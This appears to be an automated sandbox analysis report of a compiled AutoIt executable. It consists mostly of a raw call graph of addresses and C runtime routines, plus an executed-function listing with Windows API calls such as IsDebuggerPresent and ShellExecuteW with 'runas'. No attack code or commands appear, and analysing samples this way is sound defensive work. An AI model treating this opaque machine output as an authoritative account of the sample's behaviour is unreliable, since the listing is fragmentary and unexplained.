8f181b 100714->100715 100719 8f111d 100714->100719 100831 8e8d34 58 API calls __getptd_noexit 100715->100831 100718 8f10d1 100816 8e8d68 58 API calls __getptd_noexit 100718->100816 100722 8f1125 100719->100722 100728 8f113c 100719->100728 100720 8f1820 100832 8e8d68 58 API calls __getptd_noexit 100720->100832 100817 8e8d34 58 API calls __getptd_noexit 100722->100817 100725 8f1131 100833 8e8ff6 9 API calls __beginthreadex 100725->100833 100726 8f112a 100818 8e8d68 58 API calls __getptd_noexit 100726->100818 100729 8f1151 100728->100729 100730 8f116b 100728->100730 100733 8f1189 100728->100733 100760 8f10d8 100728->100760 100819 8e8d34 58 API calls __getptd_noexit 100729->100819 100730->100729 100735 8f1176 100730->100735 100820 8e8a5d 58 API calls 2 library calls 100733->100820 100806 8f5ebb 100735->100806 100736 8f1199 100739 8f11bc 100736->100739 100740 8f11a1 100736->100740 100738 8f128a 100741 8f1303 ReadFile 100738->100741 100744 8f12a0 GetConsoleMode 100738->100744 100823 8f1b11 60 API calls 3 library calls 100739->100823 100821 8e8d68 58 API calls __getptd_noexit 100740->100821 100745 8f1325 100741->100745 100746 8f17e3 GetLastError 100741->100746 100748 8f12b4 100744->100748 100749 8f1300 100744->100749 100745->100746 100753 8f12f5 100745->100753 100750 8f12e3 100746->100750 100751 8f17f0 100746->100751 100747 8f11a6 100822 8e8d34 58 API calls __getptd_noexit 100747->100822 100748->100749 100755 8f12ba ReadConsoleW 100748->100755 100749->100741 100762 8f12e9 100750->100762 100824 8e8d47 58 API calls 3 library calls 100750->100824 100829 8e8d68 58 API calls __getptd_noexit 100751->100829 100753->100762 100764 8f15c7 100753->100764 100766 8f135a 100753->100766 100755->100753 100757 8f12dd GetLastError 100755->100757 100756 8f17f5 100830 8e8d34 58 API calls __getptd_noexit 100756->100830 100757->100750 100760->100699 100761 8e2f95 _free 58 API calls 100761->100760 100762->100760 100762->100761 100763 8f1447 100763->100762 100769 8f1504 100763->100769 100770 8f14f4 100763->100770 100777 8f14b4 MultiByteToWideChar 100763->100777 100764->100762 100771 8f16cd ReadFile 100764->100771 100766->100763 100767 8f13c6 ReadFile 100766->100767 100768 8f13e7 GetLastError 100767->100768 100772 8f13f1 100767->100772 100768->100772 100769->100777 100827 8f1b11 60 API calls 3 library calls 100769->100827 100826 8e8d68 58 API calls __getptd_noexit 100770->100826 100774 8f16f0 GetLastError 100771->100774 100778 8f16fe 100771->100778 100772->100766 100825 8f1b11 60 API calls 3 library calls 100772->100825 100774->100778 100777->100757 100777->100762 100778->100764 100828 8f1b11 60 API calls 3 library calls 100778->100828 100781 8f0e02 100780->100781 100785 8f0e17 100780->100785 100867 8e8d68 58 API calls __getptd_noexit 100781->100867 100783 8f0e07 100868 8e8ff6 9 API calls __beginthreadex 100783->100868 100786 8f0e4c 100785->100786 100791 8f0e12 100785->100791 100869 8f6234 58 API calls __malloc_crt 100785->100869 100788 8e4916 __flswbuf 58 API calls 100786->100788 100789 8f0e60 100788->100789 100834 8f0f97 100789->100834 100791->100699 100792 8f0e67 100792->100791 100793 8e4916 __flswbuf 58 API calls 100792->100793 100794 8f0e8a 100793->100794 100794->100791 100795 8e4916 __flswbuf 58 API calls 100794->100795 100796 8f0e96 100795->100796 100796->100791 100797 8e4916 __flswbuf 58 API calls 100796->100797 100798 8f0ea3 100797->100798 100799 8e4916 __flswbuf 58 API calls 100798->100799 100799->100791 100800->100692 100801->100694 100802->100699 100803->100692 100804->100709 100805->100711 100807 8f5ec6 100806->100807 100808 8f5ed3 100806->100808 100809 8e8d68 __flswbuf 58 API calls 100807->100809 100811 8f5edf 100808->100811 100812 8e8d68 __flswbuf 58 API calls 100808->100812 100810 8f5ecb 100809->100810 100810->100738 100811->100738 100813 8f5f00 100812->100813 100814 8e8ff6 __beginthreadex 9 API calls 100813->100814 100814->100810 100815->100718 100816->100760 100817->100726 100818->100725 100819->100726 100820->100736 100821->100747 100822->100760 100823->100735 100824->100762 100825->100772 100826->100762 100827->100777 100828->100778 100829->100756 100830->100762 100831->100720 100832->100725 100833->100760 100835 8f0fa3 __initptd 100834->100835 100836 8f0fb0 100835->100836 100838 8f0fc7 100835->100838 100837 8e8d34 __chsize_nolock 58 API calls 100836->100837 100841 8f0fb5 100837->100841 100839 8f108b 100838->100839 100842 8f0fdb 100838->100842 100840 8e8d34 __chsize_nolock 58 API calls 100839->100840 100845 8f0ffe 100840->100845 100846 8e8d68 __flswbuf 58 API calls 100841->100846 100843 8f0ff9 100842->100843 100844 8f1006 100842->100844 100847 8e8d34 __chsize_nolock 58 API calls 100843->100847 100848 8f1028 100844->100848 100849 8f1013 100844->100849 100852 8e8d68 __flswbuf 58 API calls 100845->100852 100856 8f0fbc __initptd 100846->100856 100847->100845 100851 8ed446 ___lock_fhandle 59 API calls 100848->100851 100850 8e8d34 __chsize_nolock 58 API calls 100849->100850 100853 8f1018 100850->100853 100854 8f102e 100851->100854 100855 8f1020 100852->100855 100857 8e8d68 __flswbuf 58 API calls 100853->100857 100858 8f1054 100854->100858 100859 8f1041 100854->100859 100862 8e8ff6 __beginthreadex 9 API calls 100855->100862 100856->100792 100857->100855 100860 8e8d68 __flswbuf 58 API calls 100858->100860 100861 8f10ab __read_nolock 70 API calls 100859->100861 100863 8f1059 100860->100863 100864 8f104d 100861->100864 100862->100856 100865 8e8d34 __chsize_nolock 58 API calls 100863->100865 100866 8f1083 __read LeaveCriticalSection 100864->100866 100865->100864 100866->100856 100867->100783 100868->100791 100869->100786 100873 8e543a GetSystemTimeAsFileTime 100870->100873 100872 9291f8 100872->100465 100874 8e5468 __aulldiv 100873->100874 100874->100872 100876 8e5e9c __initptd 100875->100876 100877 8e5eae 100876->100877 100878 8e5ec3 100876->100878 100889 8e8d68 58 API calls __getptd_noexit 100877->100889 100880 8e6e4e __lock_file 59 API calls 100878->100880 100882 8e5ec9 100880->100882 100881 8e5eb3 100890 8e8ff6 9 API calls __beginthreadex 100881->100890 100891 8e5b00 67 API calls 6 library calls 100882->100891 100885 8e5ed4 100892 8e5ef4 LeaveCriticalSection LeaveCriticalSection _fseek 100885->100892 100887 8e5ee6 100888 8e5ebe __initptd 100887->100888 100888->100469 100889->100881 100890->100888 100891->100885 100892->100887 100893->100348 100894->100350 100895->100400 100897 8e4a9f __initptd 100896->100897 100898 8e4abd 100897->100898 100899 8e4ad5 100897->100899 100900 8e4acd __initptd 100897->100900 100976 8e8d68 58 API calls __getptd_noexit 100898->100976 100901 8e6e4e __lock_file 59 API calls 100899->100901 100900->100412 100903 8e4adb 100901->100903 100964 8e493a 100903->100964 100904 8e4ac2 100977 8e8ff6 9 API calls __beginthreadex 100904->100977 100910 8e55e2 __initptd 100909->100910 100911 8e560e 100910->100911 100912 8e55f6 100910->100912 100915 8e6e4e __lock_file 59 API calls 100911->100915 100919 8e5606 __initptd 100911->100919 101138 8e8d68 58 API calls __getptd_noexit 100912->101138 100914 8e55fb 101139 8e8ff6 9 API calls __beginthreadex 100914->101139 100917 8e5620 100915->100917 101122 8e556a 100917->101122 100919->100405 100930 9299d2 __tzset_nolock _wcscmp 100925->100930 100926 8c506b 74 API calls 100926->100930 100927 92949a 100927->100402 100931 8e432e 58 API calls __wsplitpath_helper 100927->100931 100928 929393 GetSystemTimeAsFileTime 100928->100930 100929 8c5045 85 API calls 100929->100930 100930->100926 100930->100927 100930->100928 100930->100929 100931->100383 100932->100378 100966 8e4949 100964->100966 100971 8e4967 100964->100971 100965 8e4957 100966->100965 100966->100971 100975 8e4981 _memmove 100966->100975 100978 8e4b0d LeaveCriticalSection LeaveCriticalSection _fseek 100971->100978 100975->100971 100976->100904 100977->100900 100978->100900 101123 8e5579 101122->101123 101126 8e558d 101122->101126 101138->100914 101139->100919 101251 8c1016 101256 8c4ad2 101251->101256 101254 8e2f80 __cinit 67 API calls 101255 8c1025 101254->101255 101257 8e0ff6 Mailbox 59 API calls 101256->101257 101258 8c4ada 101257->101258 101259 8c101b 101258->101259 101263 8c4a94 101258->101263 101259->101254 101264 8c4a9d 101263->101264 101265 8c4aaf 101263->101265 101266 8e2f80 __cinit 67 API calls 101264->101266 101267 8c4afe 101265->101267 101266->101265 101268 8c77c7 59 API calls 101267->101268 101269 8c4b16 GetVersionExW 101268->101269 101270 8c7d2c 59 API calls 101269->101270 101271 8c4b59 101270->101271 101272 8c7e8c 59 API calls 101271->101272 101277 8c4b86 101271->101277 101273 8c4b7a 101272->101273 101274 8c7886 59 API calls 101273->101274 101274->101277 101275 8c4bf1 GetCurrentProcess IsWow64Process 101276 8c4c0a 101275->101276 101279 8c4c89 GetSystemInfo 101276->101279 101280 8c4c20 101276->101280 101277->101275 101278 8fdc8d 101277->101278 101281 8c4c56 101279->101281 101291 8c4c95 101280->101291 101281->101259 101284 8c4c7d GetSystemInfo 101287 8c4c47 101284->101287 101285 8c4c32 101286 8c4c95 2 API calls 101285->101286 101288 8c4c3a GetNativeSystemInfo 101286->101288 101287->101281 101289 8c4c4d FreeLibrary 101287->101289 101288->101287 101289->101281 101292 8c4c2e 101291->101292 101293 8c4c9e LoadLibraryA 101291->101293 101292->101284 101292->101285 101293->101292 101294 8c4caf GetProcAddress 101293->101294 101294->101292 101295 8c1066 101300 8cf8cf 101295->101300 101297 8c106c 101298 8e2f80 __cinit 67 API calls 101297->101298 101299 8c1076 101298->101299 101301 8cf8f0 101300->101301 101333 8e0143 101301->101333 101305 8cf937 101306 8c77c7 59 API calls 101305->101306 101307 8cf941 101306->101307 101308 8c77c7 59 API calls 101307->101308 101309 8cf94b 101308->101309 101310 8c77c7 59 API calls 101309->101310 101311 8cf955 101310->101311 101312 8c77c7 59 API calls 101311->101312 101313 8cf993 101312->101313 101314 8c77c7 59 API calls 101313->101314 101315 8cfa5e 101314->101315 101343 8d60e7 101315->101343 101319 8cfa90 101320 8c77c7 59 API calls 101319->101320 101321 8cfa9a 101320->101321 101371 8dffde 101321->101371 101323 8cfae1 101324 8cfaf1 GetStdHandle 101323->101324 101325 8cfb3d 101324->101325 101326 9049d5 101324->101326 101327 8cfb45 OleInitialize 101325->101327 101326->101325 101328 9049de 101326->101328 101327->101297 101378 926dda 64 API calls Mailbox 101328->101378 101330 9049e5 101379 9274a9 CreateThread 101330->101379 101332 9049f1 CloseHandle 101332->101327 101380 8e021c 101333->101380 101336 8e021c 59 API calls 101337 8e0185 101336->101337 101338 8c77c7 59 API calls 101337->101338 101339 8e0191 101338->101339 101340 8c7d2c 59 API calls 101339->101340 101341 8cf8f6 101340->101341 101342 8e03a2 6 API calls 101341->101342 101342->101305 101344 8c77c7 59 API calls 101343->101344 101345 8d60f7 101344->101345 101346 8c77c7 59 API calls 101345->101346 101347 8d60ff 101346->101347 101387 8d5bfd 101347->101387 101350 8d5bfd 59 API calls 101351 8d610f 101350->101351 101352 8c77c7 59 API calls 101351->101352 101353 8d611a 101352->101353 101354 8e0ff6 Mailbox 59 API calls 101353->101354 101355 8cfa68 101354->101355 101356 8d6259 101355->101356 101357 8d6267 101356->101357 101358 8c77c7 59 API calls 101357->101358 101359 8d6272 101358->101359 101360 8c77c7 59 API calls 101359->101360 101361 8d627d 101360->101361 101362 8c77c7 59 API calls 101361->101362 101363 8d6288 101362->101363 101364 8c77c7 59 API calls 101363->101364 101365 8d6293 101364->101365 101366 8d5bfd 59 API calls 101365->101366 101367 8d629e 101366->101367 101368 8e0ff6 Mailbox 59 API calls 101367->101368 101369 8d62a5 RegisterWindowMessageW 101368->101369 101369->101319 101372 915cc3 101371->101372 101373 8dffee 101371->101373 101390 929d71 60 API calls 101372->101390 101374 8e0ff6 Mailbox 59 API calls 101373->101374 101376 8dfff6 101374->101376 101376->101323 101377 915cce 101378->101330 101379->101332 101391 92748f 65 API calls 101379->101391 101381 8c77c7 59 API calls 101380->101381 101382 8e0227 101381->101382 101383 8c77c7 59 API calls 101382->101383 101384 8e022f 101383->101384 101385 8c77c7 59 API calls 101384->101385 101386 8e017b 101385->101386 101386->101336 101388 8c77c7 59 API calls 101387->101388 101389 8d5c05 101388->101389 101389->101350 101390->101377 101392 8e7e93 101393 8e7e9f __initptd 101392->101393 101429 8ea048 GetStartupInfoW 101393->101429 101395 8e7ea4 101431 8e8dbc GetProcessHeap 101395->101431 101397 8e7efc 101398 8e7f07 101397->101398 101514 8e7fe3 58 API calls 3 library calls 101397->101514 101432 8e9d26 101398->101432 101401 8e7f0d 101402 8e7f18 __RTC_Initialize 101401->101402 101515 8e7fe3 58 API calls 3 library calls 101401->101515 101453 8ed812 101402->101453 101405 8e7f27 101406 8e7f33 GetCommandLineW 101405->101406 101516 8e7fe3 58 API calls 3 library calls 101405->101516 101472 8f5173 GetEnvironmentStringsW 101406->101472 101410 8e7f32 101410->101406 101412 8e7f4d 101413 8e7f58 101412->101413 101517 8e32f5 58 API calls 3 library calls 101412->101517 101482 8f4fa8 101413->101482 101416 8e7f5e 101417 8e7f69 101416->101417 101518 8e32f5 58 API calls 3 library calls 101416->101518 101496 8e332f 101417->101496 101420 8e7f71 101421 8e7f7c __wwincmdln 101420->101421 101519 8e32f5 58 API calls 3 library calls 101420->101519 101502 8c492e 101421->101502 101424 8e7f90 101425 8e7f9f 101424->101425 101520 8e3598 58 API calls _doexit 101424->101520 101521 8e3320 58 API calls _doexit 101425->101521 101428 8e7fa4 __initptd 101430 8ea05e 101429->101430 101430->101395 101431->101397 101522 8e33c7 36 API calls 2 library calls 101432->101522 101434 8e9d2b 101523 8e9f7c InitializeCriticalSectionAndSpinCount __ioinit 101434->101523 101436 8e9d30 101437 8e9d34 101436->101437 101525 8e9fca TlsAlloc 101436->101525 101524 8e9d9c 61 API calls 2 library calls 101437->101524 101440 8e9d39 101440->101401 101441 8e9d46 101441->101437 101442 8e9d51 101441->101442 101526 8e8a15 101442->101526 101445 8e9d93 101534 8e9d9c 61 API calls 2 library calls 101445->101534 101448 8e9d98 101448->101401 101449 8e9d72 101449->101445 101450 8e9d78 101449->101450 101533 8e9c73 58 API calls 3 library calls 101450->101533 101452 8e9d80 GetCurrentThreadId 101452->101401 101454 8ed81e __initptd 101453->101454 101455 8e9e4b __lock 58 API calls 101454->101455 101456 8ed825 101455->101456 101457 8e8a15 __calloc_crt 58 API calls 101456->101457 101458 8ed836 101457->101458 101459 8ed8a1 GetStartupInfoW 101458->101459 101460 8ed841 __initptd @_EH4_CallFilterFunc@8 101458->101460 101461 8ed8b6 101459->101461 101463 8ed9e5 101459->101463 101460->101405 101461->101463 101465 8e8a15 __calloc_crt 58 API calls 101461->101465 101469 8ed904 101461->101469 101462 8edaad 101548 8edabd LeaveCriticalSection _doexit 101462->101548 101463->101462 101466 8eda32 GetStdHandle 101463->101466 101467 8eda45 GetFileType 101463->101467 101547 8ea06b InitializeCriticalSectionAndSpinCount 101463->101547 101465->101461 101466->101463 101467->101463 101468 8ed938 GetFileType 101468->101469 101469->101463 101469->101468 101546 8ea06b InitializeCriticalSectionAndSpinCount 101469->101546 101473 8e7f43 101472->101473 101474 8f5184 101472->101474 101478 8f4d6b GetModuleFileNameW 101473->101478 101549 8e8a5d 58 API calls 2 library calls 101474->101549 101476 8f51aa _memmove 101477 8f51c0 FreeEnvironmentStringsW 101476->101477 101477->101473 101479 8f4d9f _wparse_cmdline 101478->101479 101481 8f4ddf _wparse_cmdline 101479->101481 101550 8e8a5d 58 API calls 2 library calls 101479->101550 101481->101412 101483 8f4fb9 101482->101483 101484 8f4fc1 __wsetenvp 101482->101484 101483->101416 101485 8e8a15 __calloc_crt 58 API calls 101484->101485 101492 8f4fea __wsetenvp 101485->101492 101486 8f5041 101487 8e2f95 _free 58 API calls 101486->101487 101487->101483 101488 8e8a15 __calloc_crt 58 API calls 101488->101492 101489 8f5066 101490 8e2f95 _free 58 API calls 101489->101490 101490->101483 101492->101483 101492->101486 101492->101488 101492->101489 101493 8f507d 101492->101493 101551 8f4857 58 API calls 2 library calls 101492->101551 101552 8e9006 IsProcessorFeaturePresent 101493->101552 101495 8f5089 101495->101416 101498 8e333b __IsNonwritableInCurrentImage 101496->101498 101567 8ea711 101498->101567 101499 8e3359 __initterm_e 101500 8e2f80 __cinit 67 API calls 101499->101500 101501 8e3378 __cinit __IsNonwritableInCurrentImage 101499->101501 101500->101501 101501->101420 101503 8c4948 101502->101503 101513 8c49e7 101502->101513 101504 8c4982 IsThemeActive 101503->101504 101570 8e35ac 101504->101570 101508 8c49ae 101582 8c4a5b SystemParametersInfoW SystemParametersInfoW 101508->101582 101510 8c49ba 101583 8c3b4c 101510->101583 101512 8c49c2 SystemParametersInfoW 101512->101513 101513->101424 101514->101398 101515->101402 101516->101410 101520->101425 101521->101428 101522->101434 101523->101436 101524->101440 101525->101441 101528 8e8a1c 101526->101528 101529 8e8a57 101528->101529 101531 8e8a3a 101528->101531 101535 8f5446 101528->101535 101529->101445 101532 8ea026 TlsSetValue 101529->101532 101531->101528 101531->101529 101543 8ea372 Sleep 101531->101543 101532->101449 101533->101452 101534->101448 101536 8f5451 101535->101536 101541 8f546c 101535->101541 101537 8f545d 101536->101537 101536->101541 101544 8e8d68 58 API calls __getptd_noexit 101537->101544 101538 8f547c HeapAlloc 101540 8f5462 101538->101540 101538->101541 101540->101528 101541->101538 101541->101540 101545 8e35e1 DecodePointer 101541->101545 101543->101531 101544->101540 101545->101541 101546->101469 101547->101463 101548->101460 101549->101476 101550->101481 101551->101492 101553 8e9011 101552->101553 101558 8e8e99 101553->101558 101557 8e902c 101557->101495 101559 8e8eb3 _memset ___raise_securityfailure 101558->101559 101560 8e8ed3 IsDebuggerPresent 101559->101560 101566 8ea395 SetUnhandledExceptionFilter UnhandledExceptionFilter 101560->101566 101562 8ec836 __output_l 6 API calls 101564 8e8fba 101562->101564 101563 8e8f97 ___raise_securityfailure 101563->101562 101565 8ea380 GetCurrentProcess TerminateProcess 101564->101565 101565->101557 101566->101563 101568 8ea714 EncodePointer 101567->101568 101568->101568 101569 8ea72e 101568->101569 101569->101499 101571 8e9e4b __lock 58 API calls 101570->101571 101572 8e35b7 DecodePointer EncodePointer 101571->101572 101635 8e9fb5 LeaveCriticalSection 101572->101635 101574 8c49a7 101575 8e3614 101574->101575 101576 8e361e 101575->101576 101577 8e3638 101575->101577 101576->101577 101636 8e8d68 58 API calls __getptd_noexit 101576->101636 101577->101508 101579 8e3628 101637 8e8ff6 9 API calls __beginthreadex 101579->101637 101581 8e3633 101581->101508 101582->101510 101584 8c3b59 __ftell_nolock 101583->101584 101585 8c77c7 59 API calls 101584->101585 101586 8c3b63 GetCurrentDirectoryW 101585->101586 101638 8c3778 101586->101638 101588 8c3b8c IsDebuggerPresent 101589 8fd4ad MessageBoxA 101588->101589 101590 8c3b9a 101588->101590 101592 8fd4c7 101589->101592 101590->101592 101593 8c3bb7 101590->101593 101622 8c3c73 101590->101622 101591 8c3c7a SetCurrentDirectoryW 101596 8c3c87 Mailbox 101591->101596 101848 8c7373 59 API calls Mailbox 101592->101848 101719 8c73e5 101593->101719 101596->101512 101597 8fd4d7 101602 8fd4ed SetCurrentDirectoryW 101597->101602 101602->101596 101622->101591 101635->101574 101636->101579 101637->101581 101639 8c77c7 59 API calls 101638->101639 101640 8c378e 101639->101640 101850 8c3d43 101640->101850 101642 8c37ac 101643 8c4864 61 API calls 101642->101643 101644 8c37c0 101643->101644 101645 8c7f41 59 API calls 101644->101645 101646 8c37cd 101645->101646 101647 8c4f3d 136 API calls 101646->101647 101648 8c37e6 101647->101648 101649 8fd3ae 101648->101649 101650 8c37ee Mailbox 101648->101650 101892 9297e5 101649->101892 101654 8c81a7 59 API calls 101650->101654 101653 8fd3cd 101656 8e2f95 _free 58 API calls 101653->101656 101657 8c3801 101654->101657 101655 8c4faa 84 API calls 101655->101653 101658 8fd3da 101656->101658 101864 8c93ea 101657->101864 101660 8c4faa 84 API calls 101658->101660 101662 8fd3e3 101660->101662 101666 8c3ee2 59 API calls 101662->101666 101663 8c7f41 59 API calls 101664 8c381a 101663->101664 101665 8c8620 69 API calls 101664->101665 101667 8c382c Mailbox 101665->101667 101668 8fd3fe 101666->101668 101669 8c7f41 59 API calls 101667->101669 101671 8c3ee2 59 API calls 101668->101671 101670 8c3852 101669->101670 101673 8c8620 69 API calls 101670->101673 101672 8fd41a 101671->101672 101674 8c4864 61 API calls 101672->101674 101676 8c3861 Mailbox 101673->101676 101675 8fd43f 101674->101675 101677 8c3ee2 59 API calls 101675->101677 101679 8c77c7 59 API calls 101676->101679 101678 8fd44b 101677->101678 101680 8c81a7 59 API calls 101678->101680 101681 8c387f 101679->101681 101682 8fd459 101680->101682 101867 8c3ee2 101681->101867 101684 8c3ee2 59 API calls 101682->101684 101686 8fd468 101684->101686 101693 8c81a7 59 API calls 101686->101693 101688 8c3899 101688->101662 101689 8c38a3 101688->101689 101690 8e313d _W_store_winword 60 API calls 101689->101690 101691 8c38ae 101690->101691 101691->101668 101692 8c38b8 101691->101692 101695 8e313d _W_store_winword 60 API calls 101692->101695 101694 8fd48a 101693->101694 101696 8c3ee2 59 API calls 101694->101696 101697 8c38c3 101695->101697 101698 8fd497 101696->101698 101697->101672 101699 8c38cd 101697->101699 101698->101698 101700 8e313d _W_store_winword 60 API calls 101699->101700 101701 8c38d8 101700->101701 101701->101686 101702 8c3919 101701->101702 101704 8c3ee2 59 API calls 101701->101704 101702->101686 101703 8c3926 101702->101703 101705 8c942e 59 API calls 101703->101705 101706 8c38fc 101704->101706 101707 8c3936 101705->101707 101708 8c81a7 59 API calls 101706->101708 101709 8c91b0 59 API calls 101707->101709 101710 8c390a 101708->101710 101711 8c3944 101709->101711 101712 8c3ee2 59 API calls 101710->101712 101883 8c9040 101711->101883 101712->101702 101714 8c93ea 59 API calls 101716 8c3961 101714->101716 101715 8c9040 60 API calls 101715->101716 101716->101714 101716->101715 101717 8c3ee2 59 API calls 101716->101717 101718 8c39a7 Mailbox 101716->101718 101717->101716 101718->101588 101720 8c73f2 __ftell_nolock 101719->101720 101721 8c740b 101720->101721 101722 8fee4b _memset 101720->101722 101723 8c48ae 60 API calls 101721->101723 101724 8fee67 GetOpenFileNameW 101722->101724 101725 8c7414 101723->101725 101726 8feeb6 101724->101726 101932 8e09d5 101725->101932 101728 8c7d2c 59 API calls 101726->101728 101731 8feecb 101728->101731 101731->101731 101848->101597 101851 8c3d50 __ftell_nolock 101850->101851 101852 8c7d2c 59 API calls 101851->101852 101858 8c3eb6 Mailbox 101851->101858 101854 8c3d82 101852->101854 101853 8c7b52 59 API calls 101853->101854 101854->101853 101863 8c3db8 Mailbox 101854->101863 101855 8c7b52 59 API calls 101855->101863 101856 8c3e89 101857 8c7f41 59 API calls 101856->101857 101856->101858 101860 8c3eaa 101857->101860 101858->101642 101859 8c7f41 59 API calls 101859->101863 101861 8c3f84 59 API calls 101860->101861 101861->101858 101862 8c3f84 59 API calls 101862->101863 101863->101855 101863->101856 101863->101858 101863->101859 101863->101862 101865 8e0ff6 Mailbox 59 API calls 101864->101865 101866 8c380d 101865->101866 101866->101663 101868 8c3eec 101867->101868 101869 8c3f05 101867->101869 101871 8c81a7 59 API calls 101868->101871 101870 8c7d2c 59 API calls 101869->101870 101872 8c388b 101870->101872 101871->101872 101873 8e313d 101872->101873 101874 8e31be 101873->101874 101875 8e3149 101873->101875 101929 8e31d0 60 API calls 4 library calls 101874->101929 101882 8e316e 101875->101882 101927 8e8d68 58 API calls __getptd_noexit 101875->101927 101878 8e31cb 101878->101688 101879 8e3155 101928 8e8ff6 9 API calls __beginthreadex 101879->101928 101881 8e3160 101881->101688 101882->101688 101884 8ff5a5 101883->101884 101886 8c9057 101883->101886 101884->101886 101931 8c8d3b 59 API calls Mailbox 101884->101931 101887 8c9158 101886->101887 101888 8c91a0 101886->101888 101891 8c915f 101886->101891 101889 8e0ff6 Mailbox 59 API calls 101887->101889 101930 8c9e9c 60 API calls Mailbox 101888->101930 101889->101891 101891->101716 101893 8c5045 85 API calls 101892->101893 101894 929854 101893->101894 101895 9299be 96 API calls 101894->101895 101896 929866 101895->101896 101897 8c506b 74 API calls 101896->101897 101925 8fd3c1 101896->101925 101898 929881 101897->101898 101899 8c506b 74 API calls 101898->101899 101900 929891 101899->101900 101901 8c506b 74 API calls 101900->101901 101902 9298ac 101901->101902 101903 8c506b 74 API calls 101902->101903 101904 9298c7 101903->101904 101905 8c5045 85 API calls 101904->101905 101906 9298de 101905->101906 101907 8e594c __crtCompareStringA_stat 58 API calls 101906->101907 101908 9298e5 101907->101908 101909 8e594c __crtCompareStringA_stat 58 API calls 101908->101909 101910 9298ef 101909->101910 101911 8c506b 74 API calls 101910->101911 101912 929903 101911->101912 101913 929393 GetSystemTimeAsFileTime 101912->101913 101914 929916 101913->101914 101915 929940 101914->101915 101916 92992b 101914->101916 101918 929946 101915->101918 101919 9299a5 101915->101919 101917 8e2f95 _free 58 API calls 101916->101917 101920 929931 101917->101920 101921 928d90 116 API calls 101918->101921 101922 8e2f95 _free 58 API calls 101919->101922 101923 8e2f95 _free 58 API calls 101920->101923 101924 92999d 101921->101924 101922->101925 101923->101925 101926 8e2f95 _free 58 API calls 101924->101926 101925->101653 101925->101655 101926->101925 101927->101879 101928->101881 101929->101878 101930->101891 101931->101886 101933 8f1b90 __ftell_nolock 101932->101933 101934 8e09e2 GetLongPathNameW 101933->101934 101935 8c7d2c 59 API calls 101934->101935 101936 8c741d 101935->101936 101937 8c716b 101936->101937 102235 8c3633 102236 8c366a 102235->102236 102237 8c3688 102236->102237 102238 8c36e7 102236->102238 102279 8c36e5 102236->102279 102239 8c375d PostQuitMessage 102237->102239 102240 8c3695 102237->102240 102242 8c36ed 102238->102242 102243 8fd31c 102238->102243 102249 8c36d8 102239->102249 102246 8fd38f 102240->102246 102247 8c36a0 102240->102247 102241 8c36ca DefWindowProcW 102241->102249 102244 8c3715 SetTimer RegisterWindowMessageW 102242->102244 102245 8c36f2 102242->102245 102285 8d11d0 10 API calls Mailbox 102243->102285 102244->102249 102252 8c373e CreatePopupMenu 102244->102252 102250 8fd2bf 102245->102250 102251 8c36f9 KillTimer 102245->102251 102289 922a16 71 API calls _memset 102246->102289 102253 8c36a8 102247->102253 102254 8c3767 102247->102254 102257 8fd2f8 MoveWindow 102250->102257 102258 8fd2c4 102250->102258 102280 8c44cb Shell_NotifyIconW _memset 102251->102280 102252->102249 102260 8fd374 102253->102260 102261 8c36b3 102253->102261 102283 8c4531 64 API calls _memset 102254->102283 102256 8fd343 102286 8d11f3 341 API calls Mailbox 102256->102286 102257->102249 102265 8fd2c8 102258->102265 102266 8fd2e7 SetFocus 102258->102266 102260->102241 102288 91817e 59 API calls Mailbox 102260->102288 102268 8c36be 102261->102268 102269 8c374b 102261->102269 102262 8fd3a1 102262->102241 102262->102249 102265->102268 102271 8fd2d1 102265->102271 102266->102249 102267 8c370c 102281 8c3114 DeleteObject DestroyWindow Mailbox 102267->102281 102268->102241 102287 8c44cb Shell_NotifyIconW _memset 102268->102287 102282 8c45df 81 API calls _memset 102269->102282 102270 8c375b 102270->102249 102284 8d11d0 10 API calls Mailbox 102271->102284 102277 8fd368 102278 8c43db 68 API calls 102277->102278 102278->102279 102279->102241 102280->102267 102281->102249 102282->102270 102283->102270 102284->102249 102285->102256 102286->102268 102287->102277 102288->102279 102289->102262

                        Executed Functions

                        Function 008C3B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008C3B7A
                        • IsDebuggerPresent.KERNEL32 ref: 008C3B8C
                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,009862F8,009862E0,?,?), ref: 008C3BFD
                          • Part of subcall function 008C7D2C: _memmove.LIBCMT ref: 008C7D66
                          • Part of subcall function 008D0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008C3C26,009862F8,?,?,?), ref: 008D0ACE
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 008C3C81
                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009793F0,00000010), ref: 008FD4BC
                        • SetCurrentDirectoryW.KERNEL32(?,009862F8,?,?,?), ref: 008FD4F4
                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00975D40,009862F8,?,?,?), ref: 008FD57A
                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 008FD581
                          • Part of subcall function 008C3A58: GetSysColorBrush.USER32(0000000F), ref: 008C3A62
                          • Part of subcall function 008C3A58: LoadCursorW.USER32(00000000,00007F00), ref: 008C3A71
                          • Part of subcall function 008C3A58: LoadIconW.USER32(00000063), ref: 008C3A88
                          • Part of subcall function 008C3A58: LoadIconW.USER32(000000A4), ref: 008C3A9A
                          • Part of subcall function 008C3A58: LoadIconW.USER32(000000A2), ref: 008C3AAC
                          • Part of subcall function 008C3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008C3AD2
                          • Part of subcall function 008C3A58: RegisterClassExW.USER32(?), ref: 008C3B28
                          • Part of subcall function 008C39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008C3A15
                          • Part of subcall function 008C39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008C3A36
                          • Part of subcall function 008C39E7: ShowWindow.USER32(00000000,?,?), ref: 008C3A4A
                          • Part of subcall function 008C39E7: ShowWindow.USER32(00000000,?,?), ref: 008C3A53
                          • Part of subcall function 008C43DB: _memset.LIBCMT ref: 008C4401
                          • Part of subcall function 008C43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008C44A6
                        Strings
